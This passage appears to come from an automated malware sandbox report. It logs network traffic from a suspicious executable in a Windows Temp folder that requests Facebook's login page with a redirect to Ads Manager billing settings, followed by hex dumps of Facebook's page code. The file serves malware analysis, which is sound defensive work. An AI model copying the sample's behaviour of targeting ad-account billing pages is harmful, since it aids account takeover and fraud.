                                                                                    Data Ascii: delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:844180",["TimeSpentImmediateActiveS
                                                                                    2023-02-07 18:46:36 UTC1616INData Raw: 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a 31 7d 7d 7d 2c 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 39 32 32 39 36 32 7d 2c 63 6f 6d 70 4d 61 70 3a 7b 54 72 61 6e 73 70 6f 72 74 53 65 6c 65 63 74 69 6e 67 43 6c 69 65 6e 74 53 69 6e 67 6c 65 74 6f 6e 3a 7b 72 3a 5b 22 4a 67 34 68 6f 64 35 22 2c 22 33 7a 68 73 44 6d 55 22 2c 22 59 76 32 52 71 37 4e 22 5d 2c 72 64 73 3a 7b 6d 3a 5b 22 43 6f 6e 74 65 78 74 75 61 6c 43 6f 6e 66 69 67 22 2c 22 42 6c 61 64 65 52 75 6e 6e 65 72 43 6c 69 65 6e 74 22 2c 22 44 47 57 52 65 71 75 65 73 74 53 74 72 65 61 6d 43 6c 69 65 6e 74 22 2c 22 4d 71 74 74 4c 6f 6e 67 50 6f 6c 6c 69 6e 67 52 75 6e 6e 65 72 22 2c 22 42 61 6e 7a 61 69
                                                                                    Data Ascii: r:1},"1829320":{r:1},"1843988":{r:1}}},hblp:{consistency:{rev:1006922962},compMap:{TransportSelectingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","Banzai


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.349710157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:36 UTC198OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:45:36 UTC199INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: unsafe-none
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: 0vm/8I8SNdKVTJ8OyhzeiB5vOfSY+MSlVEdgCkfZyMmm399tNBJDn3byMN/GMHQLmPYx8pSyQN/MPJrxK+S1Og==
                                                                                    Date: Tue, 07 Feb 2023 18:45:36 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    Connection: close
                                                                                    2023-02-07 18:45:36 UTC201INData Raw: 31 61 63 0d 0a
                                                                                    Data Ascii: 1ac
                                                                                    2023-02-07 18:45:36 UTC201INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}wi
                                                                                    2023-02-07 18:45:36 UTC201INData Raw: 64 34 33 31 0d 0a 22 41 58 69 59 6d 50 34 71 46 61 51 48 61 73 63 72 31 6b 30 22 2c 22 67 6b 5f 69 6e 73 74 72 75 6d 65 6e 74 5f 6f 62 6a 65 63 74 5f 75 72 6c 22 3a 74 72 75 65 2c 22 73 74 61 63 6b 5f 74 72 61 63 65 5f 6c 69 6d 69 74 22 3a 33 30 2c 22 74 69 6d 65 73 6c 69 63 65 42 75 66 66 65 72 53 69 7a 65 22 3a 35 30 30 30 2c 22 73 68 6f 77 5f 69 6e 76 61 72 69 61 6e 74 5f 64 65 63 6f 64 65 72 22 3a 66 61 6c 73 65 2c 22 63 6f 6d 70 61 74 5f 69 66 72 61 6d 65 5f 74 6f 6b 65 6e 22 3a 22 41 51 34 4d 48 6b 35 5f 74 78 38 47 57 30 67 2d 78 58 30 22 2c 22 69 73 43 51 75 69 63 6b 22 3a 66 61 6c 73 65 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63
                                                                                    Data Ascii: d431"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){func
                                                                                    2023-02-07 18:45:36 UTC203INData Raw: 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 7a 6e 59 37 71 31 6f 6c 49 33 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 54 47 65 73 41 30 61 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57
                                                                                    Data Ascii: t" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/XznY7q1olI3.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TGesA0a" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3W
                                                                                    2023-02-07 18:45:36 UTC204INData Raw: 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4d 2f 72 2f 34 78 30 34 72 4a 74 4c 56 4d 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 76 36 59 65 42 69 45 22 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 74 63 6e 79 45 48 34 69 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39
                                                                                    Data Ascii: cdn.net/rsrc.php/v3/yM/r/4x04rJtLVMo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="v6YeBiE" nonce="tcnyEH4i"></script><script nonce="tcnyEH4i">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949
                                                                                    2023-02-07 18:45:36 UTC205INData Raw: 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 7d 2c 36 34 32 31 5d 2c 5b 22 43 75 72 72 65 6e 74 41 64 41 63 63 6f 75 6e 74 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 44
                                                                                    Data Ascii: rect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD
                                                                                    2023-02-07 18:45:36 UTC207INData Raw: 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 57 4f 52 4b 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c
                                                                                    Data Ascii: USINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,
                                                                                    2023-02-07 18:45:36 UTC208INData Raw: 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54 45 5f 46 4f 52 5f 53 41 50 22 2c 22 45 4f 5f 44 49 53
                                                                                    Data Ascii: s","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DIS
                                                                                    2023-02-07 18:45:36 UTC210INData Raw: 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53 63 45 22 2c 22 35 33 67 43 78 4b 71 32 38 31 47 22 2c 22 33 79 7a 7a 77 42 59 37 4e 70 6a 22 2c 22 31 6f 6e 7a 49 76 30 6a 48 36 48 22 2c 22 38 50 6c 4b 75 6f 77 61 66 65 38 22 2c 22 31 6e 74 6a 5a 32 7a 67 66 30 33 22 2c 22 34
                                                                                    Data Ascii: IEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4
                                                                                    2023-02-07 18:45:36 UTC211INData Raw: 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b
                                                                                    Data Ascii: ShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook
                                                                                    2023-02-07 18:45:36 UTC213INData Raw: 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 76 57 5a 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f
                                                                                    Data Ascii: stemData":null},54],["SessionNameConfig",[],{"seed":"2vWZ"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/
                                                                                    2023-02-07 18:45:36 UTC214INData Raw: 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d 65 6e 64 70 6f 69 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 65 64 75 63 61 74 69 6f 6e 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c
                                                                                    Data Ascii: ax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\
                                                                                    2023-02-07 18:45:36 UTC216INData Raw: 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 73 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 69 6e 64 65 78 2e 70 68 70 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 2e 70 68 70 22 3a 31 2c 22 5c 2f 73 72 72 5c 2f 22 3a 31 2c 22 5c 2f 6d 73 69 74 65 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 66 62 73 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f
                                                                                    Data Ascii: /expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/
                                                                                    2023-02-07 18:45:36 UTC217INData Raw: 6f 62 74 41 36 72 5a 52 47 47 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 39 36 37 30 33 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 67 78 69 30 4e 71 76 76 73 79 31 48 5a 4a 39 67 78 59 63 67 68 66 77 33 51 4e 55 6a 31 72 76 30 4b 77 47 5f 63 76 62 6c 4c 43 6a 69 6f 62 74 41 36 72 5a 52 47 47 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 30 38 38 38 36 22 2c 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 22 41 61 33 67 78 69 30 4e
                                                                                    Data Ascii: obtA6rZRGGOyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:696703",[],{"__rc":[null,"Aa3gxi0Nqvvsy1HZJ9gxYcghfw3QNUj1rv0KwG_cvblLCjiobtA6rZRGGOyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerImpl","Aa3gxi0N
                                                                                    2023-02-07 18:45:36 UTC219INData Raw: 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 32 35 31 30 30 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 22 41 61 33 67 78 69 30 4e 71 76 76 73 79 31 48 5a 4a 39 67 78 59 63 67 68 66 77 33 51 4e 55 6a 31 72 76 30 4b 77 47 5f 63 76 62 6c 4c 43 6a 69 6f 62 74 41 36 72 5a 52 47 47 4f 79 43 2d 67 33 53 5f 36 63 75 45 79 39 5a 50 35 75 61 46 35 44 2d 42 64 6a 76 39 67 78 6e 34 63 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 32 39 34 31 34 22 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 22 2c 22 41 61 33 4a 53 55
                                                                                    Data Ascii: OyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa3gxi0Nqvvsy1HZJ9gxYcghfw3QNUj1rv0KwG_cvblLCjiobtA6rZRGGOyC-g3S_6cuEy9ZP5uaF5D-Bdjv9gxn4cY"]},-1],["cr:729414",["VisualCompletion"],{"__rc":["VisualCompletion","Aa3JSU
                                                                                    2023-02-07 18:45:36 UTC220INData Raw: 4c 78 68 54 43 53 72 74 33 48 74 49 75 39 53 59 47 63 6d 69 7a 5f 53 35 53 70 48 49 49 35 6a 6d 4f 4c 64 71 41 58 71 37 35 34 30 57 6f 38 71 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 31 43 43 6c 47 46 57 78 70 48 2d 4e 44 55 33 32 61 75 47 59 54 78 2d 4e 6f 73 33 58 46 59 78 53 4c 4b 75 4f 61 67 78 79 47 6c 42 63 33 59 6b 55 41 4d 35 39 2d 72 64 38 77 51 4c 78 42 6e 7a 51 31 37 4f 73 43 4c 42 79 41 49 78 55 64 70 78 76 4f 64 4a 42 49 6d 33 4a 6e 56 22 5d 7d 2c 2d 31 5d 5d 2c 22 72 65 71 75 69 72 65 22 3a 5b 5b 22 6d 61 72 6b 4a 53 45 6e 61 62 6c 65 64 22 5d 2c 5b 22 6c 6f 77 65 72 44 6f 6d 61 69 6e 22 5d 2c 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 22 5d
